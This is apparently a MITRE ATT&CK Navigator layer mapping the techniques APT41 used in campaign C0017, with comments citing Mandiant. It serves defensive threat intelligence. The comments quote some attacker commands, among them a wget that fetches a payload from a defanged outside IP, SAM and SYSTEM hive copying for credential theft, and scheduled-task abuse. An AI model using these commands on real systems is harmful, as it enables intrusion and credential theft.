{"description": "Enterprise techniques used by C0017, ATT&CK campaign C0017 (v1.0)", "name": "C0017 (C0017)", "domain": "enterprise-attack", "versions": {"layer": "4.5", "attack": "19", "navigator": "5.3.2"}, "techniques": [{"techniqueID": "T1134", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\\SYSTEM` privilege escalation.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1071", "showSubtechniques": true}, {"techniqueID": "T1071.001", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.(Citation: Mandiant APT41)\n", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1560", "showSubtechniques": true}, {"techniqueID": "T1560.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) hex-encoded PII data prior to exfiltration.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1059", "showSubtechniques": true}, {"techniqueID": "T1059.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `cmd.exe` to execute reconnaissance commands.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1059.007", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) deployed JScript web shells on compromised systems.(Citation: Mandiant APT41)\n", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1005", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.(Citation: Mandiant APT41) ", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1001", "showSubtechniques": true}, {"techniqueID": "T1001.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1074", "showSubtechniques": true}, {"techniqueID": "T1074.001", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1140", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the DUSTPAN loader to decrypt embedded payloads.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1048", "showSubtechniques": true}, {"techniqueID": "T1048.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1041", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used its Cloudflare services C2 channels for data exfiltration.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1567", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used Cloudflare services for data exfiltration.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1190", "comment": "\nDuring [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1574", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.(Citation: Mandiant APT41) ", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1105", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) downloaded malicious payloads onto compromised systems.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1680", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) issued `ping -n 1 ((cmd /c dir c:\\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems.(Citation: Mandiant APT41)\n", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1036", "showSubtechniques": true}, {"techniqueID": "T1036.004", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `SCHTASKS  /Change` to modify legitimate scheduled tasks to run malicious code.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1036.005", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used file names beginning with USERS, SYSUSER, and SYSLOG for [DEADEYE](https://attack.mitre.org/software/S1052), and changed [KEYPLUG](https://attack.mitre.org/software/S1051) file extensions from .vmp  to .upx likely to avoid hunting detections.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1027", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) broke malicious binaries, including [DEADEYE](https://attack.mitre.org/software/S1052) and [KEYPLUG](https://attack.mitre.org/software/S1051), into multiple sections on disk to evade detection.(Citation: Mandiant APT41)", "score": 1, "showSubtechniques": true}, {"techniqueID": "T1027.002", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used VMProtect to slow the reverse engineering of malicious binaries.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1588", "showSubtechniques": true}, {"techniqueID": "T1588.002", "comment": "For [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1003", "showSubtechniques": true}, {"techniqueID": "T1003.002", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1090", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the Cloudflare CDN to proxy C2 traffic.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1053", "showSubtechniques": true}, {"techniqueID": "T1053.005", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor`, `\\Microsoft\\Windows\\Ras\\ManagerMobility`, `\\Microsoft\\Windows\\WDI\\SrvSetupResults`, and `\\Microsoft\\Windows\\WDI\\USOShared`.(Citation: Mandiant APT41) ", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1505", "showSubtechniques": true}, {"techniqueID": "T1505.003", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) deployed JScript web shells through the creation of malicious ViewState objects.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1016", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `cmd.exe /c ping %userdomain%` for discovery.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1033", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `whoami` to gather information from victim machines.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1102", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the Cloudflare services for C2 communications.(Citation: Mandiant APT41)", "score": 1, "showSubtechniques": true}, {"techniqueID": "T1102.001", "comment": "During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used dead drop resolvers on two separate tech community forums for their [KEYPLUG](https://attack.mitre.org/software/S1051) Windows-version backdoor; notably [APT41](https://attack.mitre.org/groups/G0096) updated the community forum posts frequently with new dead drop resolvers during the campaign.(Citation: Mandiant APT41)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}], "gradient": {"colors": ["#ffffff", "#66b1ff"], "minValue": 0, "maxValue": 1}, "legendItems": [{"label": "used by C0017", "color": "#66b1ff"}]}